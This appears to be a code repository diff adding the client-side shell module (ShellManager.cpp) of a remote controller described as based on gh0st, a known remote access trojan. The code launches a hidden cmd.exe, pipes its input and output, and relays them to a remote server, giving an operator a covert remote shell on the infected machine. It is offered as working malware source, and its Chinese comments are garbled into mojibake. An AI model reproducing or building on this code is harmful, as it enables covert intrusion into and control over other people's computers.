基于gh0st的远程控制器

实现了终端管理、进程管理、窗口管理、桌面管理、文件管理、语音管理、视频管理、服务管理、注册表管理等功能。

client/ShellManager.cpp

@@ -0,0 +1,191 @@
+// ShellManager.cpp: implementation of the CShellManager class.
+//
+//////////////////////////////////////////////////////////////////////
+
+#include "stdafx.h"
+#include "ShellManager.h"
+#include "Common.h"
+#include <IOSTREAM>
+using namespace std;
+
+//////////////////////////////////////////////////////////////////////
+// Construction/Destruction
+//////////////////////////////////////////////////////////////////////
+
+BOOL bStarting = TRUE;
+
+CShellManager::CShellManager(IOCPClient* ClientObject, int n):CManager(ClientObject)
+{
+	m_hThreadRead = NULL;
+	m_hShellProcessHandle   = NULL;    //<2F><><EFBFBD><EFBFBD>Cmd<6D><64><EFBFBD>̵Ľ<CCB5><C4BD>̾<EFBFBD><CCBE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>߳̾<DFB3><CCBE><EFBFBD>
+	m_hShellThreadHandle	= NULL;
+	SECURITY_ATTRIBUTES  sa = {0}; 	
+	sa.nLength = sizeof(sa);
+    sa.lpSecurityDescriptor = NULL; 
+    sa.bInheritHandle = TRUE;     //<2F><>Ҫ
+	m_hReadPipeHandle	= NULL;   //client
+	m_hWritePipeHandle	= NULL;   //client
+	m_hReadPipeShell	= NULL;   //cmd
+	m_hWritePipeShell	= NULL;   //cmd
+	//<2F><><EFBFBD><EFBFBD><EFBFBD>ܵ<EFBFBD>
+	if(!CreatePipe(&m_hReadPipeHandle, &m_hWritePipeShell, &sa, 0))
+	{
+		if(m_hReadPipeHandle != NULL)
+		{
+			CloseHandle(m_hReadPipeHandle);
+		}
+		if(m_hWritePipeShell != NULL)
+		{
+			CloseHandle(m_hWritePipeShell);
+		}
+		return;
+    }
+	
+    if(!CreatePipe(&m_hReadPipeShell, &m_hWritePipeHandle, &sa, 0)) 
+	{
+		if(m_hWritePipeHandle != NULL)
+		{
+			CloseHandle(m_hWritePipeHandle);
+		}
+		if(m_hReadPipeShell != NULL)
+		{
+			CloseHandle(m_hReadPipeShell);
+		}
+		return;
+    }
+
+	//<2F><><EFBFBD><EFBFBD>Cmd FullPath
+	char  strShellPath[MAX_PATH] = {0}; 	
+	GetSystemDirectory(strShellPath, MAX_PATH);  //C:\windows\system32
+	//C:\windows\system32\cmd.exe
+	strcat(strShellPath,"\\cmd.exe");
+
+	//1 Cmd Input Output Ҫ<>͹ܵ<CDB9><DCB5><EFBFBD>Ӧ<EFBFBD><D3A6>
+	//2 Cmd Hide
+
+	STARTUPINFO          si = {0};
+	PROCESS_INFORMATION  pi = {0};    //CreateProcess
+
+	memset((void *)&si, 0, sizeof(si));
+    memset((void *)&pi, 0, sizeof(pi));
+
+	si.cb = sizeof(STARTUPINFO);  //<2F><>Ҫ
+    
+    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
+    si.hStdInput  = m_hReadPipeShell;                           //<2F><><EFBFBD>ܵ<EFBFBD><DCB5><EFBFBD>ֵ
+    si.hStdOutput = si.hStdError = m_hWritePipeShell; 
+
+	si.wShowWindow = SW_HIDE;
+
+	//<2F><><EFBFBD><EFBFBD>Cmd<6D><64><EFBFBD><EFBFBD>
+	//3 <20>̳<EFBFBD>
+	
+	if (!CreateProcess(strShellPath, NULL, NULL, NULL, TRUE, 
+		NORMAL_PRIORITY_CLASS, NULL, NULL, &si, &pi)) 
+	{
+		CloseHandle(m_hReadPipeHandle);
+		CloseHandle(m_hWritePipeHandle);
+		CloseHandle(m_hReadPipeShell);
+		CloseHandle(m_hWritePipeShell);
+		return;
+    }
+
+	m_hShellProcessHandle   = pi.hProcess;    //<2F><><EFBFBD><EFBFBD>Cmd<6D><64><EFBFBD>̵Ľ<CCB5><C4BD>̾<EFBFBD><CCBE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>߳̾<DFB3><CCBE><EFBFBD>
+	m_hShellThreadHandle	= pi.hThread;
+
+	BYTE	bToken = TOKEN_SHELL_START;      //<2F><><EFBFBD><EFBFBD>ͷ<EFBFBD>ļ<EFBFBD> Common.h     
+	m_ClientObject->OnServerSending((char*)&bToken, 1);
+
+	WaitForDialogOpen();
+
+	m_hThreadRead = CreateThread(NULL, 0, 
+		(LPTHREAD_START_ROUTINE)ReadPipeThread, (LPVOID)this, 0, NULL);
+}
+
+DWORD WINAPI CShellManager::ReadPipeThread(LPVOID lParam)
+{
+	unsigned long   dwReturn = 0;
+	char	szBuffer[1024] = {0};
+	DWORD	dwTotal = 0;
+	CShellManager *This = (CShellManager*)lParam;
+	while (bStarting)
+	{
+		Sleep(100);
+		//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ƿ<EFBFBD><C7B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>  <20><><EFBFBD>ݵĴ<DDB5>С<EFBFBD>Ƕ<EFBFBD><C7B6><EFBFBD>
+		while (PeekNamedPipe(This->m_hReadPipeHandle,     //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
+			szBuffer, sizeof(szBuffer), &dwReturn, &dwTotal, NULL)) 
+		{
+			//<2F><><EFBFBD><EFBFBD>û<EFBFBD><C3BB><EFBFBD><EFBFBD><EFBFBD>ݾ<EFBFBD><DDBE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ѭ<EFBFBD><D1AD>
+			if (dwReturn <= 0)
+				break;
+			memset(szBuffer, 0, sizeof(szBuffer));
+			LPBYTE szTotalBuffer = (LPBYTE)LocalAlloc(LPTR, dwTotal);
+			//<2F><>ȡ<EFBFBD>ܵ<EFBFBD><DCB5><EFBFBD><EFBFBD><EFBFBD>
+			ReadFile(This->m_hReadPipeHandle, 
+				szTotalBuffer, dwTotal, &dwReturn, NULL);
+		
+			This->m_ClientObject->OnServerSending((char*)szTotalBuffer, dwReturn);  
+	
+			LocalFree(szTotalBuffer);
+		}
+	}
+	cout<<"ReadPipe<EFBFBD>߳<EFBFBD><EFBFBD>˳<EFBFBD>"<<endl;
+	return 0;
+}
+
+VOID CShellManager::OnReceive(PBYTE szBuffer, ULONG ulLength)
+{
+	switch(szBuffer[0])
+	{
+	case COMMAND_NEXT:
+		{			
+			NotifyDialogIsOpen();						
+			break;
+		}		
+	default:
+		{		
+			unsigned long	dwReturn = 0;
+			if(WriteFile(m_hWritePipeHandle, szBuffer, ulLength, &dwReturn,NULL))
+			{			
+			}
+
+			break;
+		}
+	}
+}
+
+
+
+CShellManager::~CShellManager()
+{
+	bStarting = FALSE;
+	
+	TerminateProcess(m_hShellProcessHandle, 0);   //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Լ<EFBFBD><D4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Cmd<6D><64><EFBFBD><EFBFBD>
+	TerminateThread(m_hShellThreadHandle, 0);     //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Լ<EFBFBD><D4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Cmd<6D>߳<EFBFBD>
+	Sleep(100);
+	
+	if (m_hReadPipeHandle != NULL)
+	{
+		DisconnectNamedPipe(m_hReadPipeHandle);
+		CloseHandle(m_hReadPipeHandle);
+		m_hReadPipeHandle = NULL;
+	}
+	if (m_hWritePipeHandle != NULL)
+	{
+		DisconnectNamedPipe(m_hWritePipeHandle);
+	   CloseHandle(m_hWritePipeHandle);
+	   m_hWritePipeHandle = NULL;
+	}
+	if (m_hReadPipeShell != NULL)
+	{
+		DisconnectNamedPipe(m_hReadPipeShell);
+		CloseHandle(m_hReadPipeShell);
+		m_hReadPipeShell = NULL;
+	}
+	if (m_hWritePipeShell != NULL)
+	{
+		DisconnectNamedPipe(m_hWritePipeShell);
+	   CloseHandle(m_hWritePipeShell);
+	   m_hWritePipeShell = NULL;  
+	}
+}